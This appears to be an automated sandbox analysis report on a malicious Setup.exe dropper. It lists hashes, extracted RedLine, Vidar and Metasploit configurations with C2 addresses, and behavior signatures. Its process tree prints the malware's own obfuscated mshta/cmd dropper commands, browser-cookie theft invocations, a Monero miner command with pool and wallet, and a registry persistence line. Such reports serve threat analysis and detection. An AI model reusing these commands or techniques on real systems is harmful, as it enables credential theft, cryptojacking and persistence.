Resubmissions
15/10/2024, 15:36
241015-s1zlzasdkc 1001/07/2024, 18:32
240701-w6yteawhmq 1001/07/2024, 14:52
240701-r82wmaxdnd 1001/07/2024, 14:52
240701-r8syqa1dpp 1011/03/2024, 21:22
240311-z8dsssgg58 1001/09/2021, 13:18
210901-5bmxjspa5s 1001/09/2021, 13:04
210901-te4btfspqa 1001/09/2021, 05:12
210901-4wnkwm1p3j 1031/08/2021, 21:47
210831-41rp97dma2 10Analysis
-
max time kernel
154s -
max time network
1813s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
24/08/2021, 20:54
General
-
Target
Setup.exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
supertraff
C2
135.148.139.222:1494
Extracted
Family
redline
Botnet
24.08
C2
95.181.172.100:55640
Extracted
Family
redline
Botnet
dibild2
C2
135.148.139.222:1494
Extracted
Family
vidar
Version
40.1
Botnet
937
C2
https://eduarroma.tumblr.com/
Attributes
-
profile_id
937
Extracted
Family
metasploit
Version
windows/single_exec
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 1 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 35 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 3 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 12 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 4 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 20 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 5 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 54 IoCs
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 8 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 7 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 41 IoCs
-
Suspicious use of AdjustPrivilegeToken 14 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\22oiVanbooF8DL_R5SnjI4Vq.exe"C:\Users\Admin\Documents\22oiVanbooF8DL_R5SnjI4Vq.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1971958712.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\1971958712.exe"C:\Users\Admin\AppData\Local\Temp\1971958712.exe"4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\9265678534.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\9265678534.exe"C:\Users\Admin\AppData\Local\Temp\9265678534.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 7725⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 8685⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "22oiVanbooF8DL_R5SnjI4Vq.exe" /f & erase "C:\Users\Admin\Documents\22oiVanbooF8DL_R5SnjI4Vq.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "22oiVanbooF8DL_R5SnjI4Vq.exe" /f4⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Documents\6CTbj_PvPVwmC0UoxinDcC8i.exe"C:\Users\Admin\Documents\6CTbj_PvPVwmC0UoxinDcC8i.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\r8wK8miXIew0GxPB_M3SqNYt.exe"C:\Users\Admin\Documents\r8wK8miXIew0GxPB_M3SqNYt.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 3883⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 3763⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 4043⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 6283⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 7083⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 7123⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 7603⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 6323⤵
- Program crash
-
-
C:\Users\Admin\Documents\r8wK8miXIew0GxPB_M3SqNYt.exe"C:\Users\Admin\Documents\r8wK8miXIew0GxPB_M3SqNYt.exe"3⤵
-
-
-
C:\Users\Admin\Documents\yCWmc1V30o6dlR0xii5erM2K.exe"C:\Users\Admin\Documents\yCWmc1V30o6dlR0xii5erM2K.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\0HZX1v2M4nK4m4r3L_ILsrOi.exe"C:\Users\Admin\Documents\0HZX1v2M4nK4m4r3L_ILsrOi.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\cBnlvjc97Cmm56_CDemU1Bs1.exe"C:\Users\Admin\Documents\cBnlvjc97Cmm56_CDemU1Bs1.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\rbBrlVBwQcaFGA2vxwRmNn5Q.exe"C:\Users\Admin\Documents\rbBrlVBwQcaFGA2vxwRmNn5Q.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\rbBrlVBwQcaFGA2vxwRmNn5Q.exe"C:\Users\Admin\Documents\rbBrlVBwQcaFGA2vxwRmNn5Q.exe"3⤵
-
-
-
C:\Users\Admin\Documents\I99YptBkWxx9pT4JWVCVfIPO.exe"C:\Users\Admin\Documents\I99YptBkWxx9pT4JWVCVfIPO.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\lW0NRBt72kgGuEXqrfYFIJs1.exe"C:\Users\Admin\Documents\lW0NRBt72kgGuEXqrfYFIJs1.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\lW0NRBt72kgGuEXqrfYFIJs1.exeC:\Users\Admin\Documents\lW0NRBt72kgGuEXqrfYFIJs1.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Documents\hhWSowo56ICH5Ct16_uDvViF.exe"C:\Users\Admin\Documents\hhWSowo56ICH5Ct16_uDvViF.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\hhWSowo56ICH5Ct16_uDvViF.exeC:\Users\Admin\Documents\hhWSowo56ICH5Ct16_uDvViF.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Documents\RImJ90i5WyDa_CR9AVZ5npoI.exe"C:\Users\Admin\Documents\RImJ90i5WyDa_CR9AVZ5npoI.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\IQp3iOsR3ggTRvROqmeyfMXx.exe"C:\Users\Admin\Documents\IQp3iOsR3ggTRvROqmeyfMXx.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\4413775.exe"C:\Users\Admin\AppData\Roaming\4413775.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\4221790.exe"C:\Users\Admin\AppData\Roaming\4221790.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Roaming\3471943.exe"C:\Users\Admin\AppData\Roaming\3471943.exe"3⤵
-
-
C:\Users\Admin\AppData\Roaming\8514556.exe"C:\Users\Admin\AppData\Roaming\8514556.exe"3⤵
-
-
-
C:\Users\Admin\Documents\KkjvE1gBgcSCLctD3FV4gePo.exe"C:\Users\Admin\Documents\KkjvE1gBgcSCLctD3FV4gePo.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\PNlW9Ynw3hrZheQ4fo5oW07r.exe"C:\Users\Admin\Documents\PNlW9Ynw3hrZheQ4fo5oW07r.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\PNlW9Ynw3hrZheQ4fo5oW07r.exe"C:\Users\Admin\Documents\PNlW9Ynw3hrZheQ4fo5oW07r.exe"3⤵
-
-
-
C:\Users\Admin\Documents\haQopfVIAQr4qq3pQM_0dwtd.exe"C:\Users\Admin\Documents\haQopfVIAQr4qq3pQM_0dwtd.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\LyMjURO0cyxMA3cQmPaS6KGJ.exe"C:\Users\Admin\Documents\LyMjURO0cyxMA3cQmPaS6KGJ.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "LyMjURO0cyxMA3cQmPaS6KGJ.exe" /f & erase "C:\Users\Admin\Documents\LyMjURO0cyxMA3cQmPaS6KGJ.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "LyMjURO0cyxMA3cQmPaS6KGJ.exe" /f4⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Documents\7bafckZ5rtgPIZJG86zfVdHi.exe"C:\Users\Admin\Documents\7bafckZ5rtgPIZJG86zfVdHi.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 7603⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 8123⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 7483⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 7403⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 9363⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 10003⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 10043⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 13443⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 13963⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 14123⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 15683⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 15963⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\cyBfhO12Wuh6n7rG4xU4H8tZ.exe"C:\Users\Admin\Documents\cyBfhO12Wuh6n7rG4xU4H8tZ.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\4tyIUkvpHdBTXMfrt6Q9KPl8.exe"C:\Users\Admin\Documents\4tyIUkvpHdBTXMfrt6Q9KPl8.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
-
-
-
-
C:\Users\Admin\Documents\mah7ahHqr_vjx0vrQ37YCHAD.exe"C:\Users\Admin\Documents\mah7ahHqr_vjx0vrQ37YCHAD.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3284 -s 6683⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3284 -s 7043⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3284 -s 7083⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3284 -s 6643⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3284 -s 10763⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\7u_7a9fRpOJFj9_7K6FfqV7A.exe"C:\Users\Admin\Documents\7u_7a9fRpOJFj9_7K6FfqV7A.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\mwEOhluSw0mfDbqmPZCcZKms.exe"C:\Users\Admin\Documents\mwEOhluSw0mfDbqmPZCcZKms.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\mwEOhluSw0mfDbqmPZCcZKms.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\mwEOhluSw0mfDbqmPZCcZKms.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\mwEOhluSw0mfDbqmPZCcZKms.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\mwEOhluSw0mfDbqmPZCcZKms.exe" ) do taskkill -IM "%~nXW" -f4⤵
-
C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXeWO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu95⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f7⤵
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE6⤵
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "mwEOhluSw0mfDbqmPZCcZKms.exe" -f5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Users\Admin\Documents\fTYCIa4eOgEhVJfKlKbYVDKT.exe"C:\Users\Admin\Documents\fTYCIa4eOgEhVJfKlKbYVDKT.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\fTYCIa4eOgEhVJfKlKbYVDKT.exe"C:\Users\Admin\Documents\fTYCIa4eOgEhVJfKlKbYVDKT.exe" -q3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\ERJcaxlU8Orr_cChsgDRUkUD.exe"C:\Users\Admin\Documents\ERJcaxlU8Orr_cChsgDRUkUD.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-Q80FT.tmp\ERJcaxlU8Orr_cChsgDRUkUD.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q80FT.tmp\ERJcaxlU8Orr_cChsgDRUkUD.tmp" /SL5="$2027A,138429,56832,C:\Users\Admin\Documents\ERJcaxlU8Orr_cChsgDRUkUD.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-V3G28.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-V3G28.tmp\Setup.exe" /Verysilent4⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-M87G2.tmp\Stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-M87G2.tmp\Stats.tmp" /SL5="$10354,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FQJ6T.tmp\builder.exe"C:\Users\Admin\AppData\Local\Temp\is-FQJ6T.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'7⤵
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 7566⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 8086⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 7806⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 8206⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 9526⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 9886⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 10126⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 13486⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 14406⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 14006⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 15006⤵
- Program crash
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579453 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8R8CQ.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-8R8CQ.tmp\Inlog.tmp" /SL5="$10358,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-06OR5.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-06OR5.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7217⤵
-
C:\Users\Admin\AppData\Local\Temp\is-NQNGM.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-NQNGM.tmp\Setup.tmp" /SL5="$202E6,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-06OR5.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7218⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-EFADH.tmp\{app}\microsoft.cab -F:* %ProgramData%9⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-EFADH.tmp\{app}\microsoft.cab -F:* C:\ProgramData10⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f9⤵
-
